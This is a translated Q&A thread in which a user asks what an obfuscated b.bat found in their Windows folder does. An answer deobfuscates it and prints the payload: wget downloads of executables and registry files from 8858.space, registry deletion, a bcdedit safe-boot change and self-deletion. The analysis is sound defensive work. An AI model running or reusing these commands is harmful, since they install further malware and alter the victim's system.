2

我正在运行 HitmanPro 病毒扫描,它检测到位于我的 windows 目录中的b.exe 。还有另一个文件,b.bat,大概链接到 b.exe,它有非常奇怪的代码,我从未见过类似的东西。蝙蝠在做什么?

它首先设置奇怪的参数。

@echo off 
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::

然后使用这些来执行一长串奇怪的命令,这是其中的一个片段:

s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "gdfg5=W"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"

其次是设置东西,做更多奇怪的事情:

set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
%pi%%j%g d%j%l%j%t%j% %yr3%H%lkj6%L%gdg5%%hy%S%vbvc56%FT%gdfg5%A%ssd3%E%hy%%gdg5%%n3%c%pi%%fsf4%s%fsf4%f%a3%%hy%%gdfg5%%n3%nd%fsf4%w%xj66%%hy%Cu%pi%r%j%n%a3%V%j%%pi%s%n3%%fsf4%n%hy%Un%n3%n%xj66%%a3%al%aa2%%hy%%title%%yr3% %a4%f %a4%r%j%g%a6%32

这是完整 bat 代码的 Pastebin

这他妈到底在干什么?!?!

4

2 回答 2

3
于 2020-02-22T23:10:21.213 回答
1

第二个块扩展为 'set' 命令,用 %j% 和 %a3% 代替 'e' 和 't':

set "yui=5"
set "zx3=""
set "gs1=in"
set "gdfg5=W"
set "a5=."
set "c44=a"

到目前为止,您应该意识到它是一种混淆技术,可以扩展为它想在您的系统上运行的脚本。在脚本开头插入setlocal并用echo解除有害行以提取含义:

for /f "usebackq delims=" %i in ("s.txt") do set %~i
set "title="
set "sub="
set "pos="
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" /f /reg:32
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/e.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/usw.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/at.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/ct.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/et.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mt.reg" --referer="alpha"
regedit /s C:\WINDOWS\c.reg
bcdedit /set "{current}" safeboot "minimal"
del C:\WINDOWS\b.exe
del C:\WINDOWS\c.reg
C:\WINDOWS\curl\curl.exe "http://8858.space/curl/runi.php?subid=_" --referer "alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/y.txt" --referer="alpha"
del b.bat

失去了一些意义,比如可能在 s.txt 中定义的titlesubpos变量——但它的作用非常清楚:它修改了您的注册表和启动配置,下载了更多的恶意软件并自行删除。如果这在我的电脑上运行,我会备份我的东西,格式化并重新安装。

于 2020-02-22T23:17:38.723 回答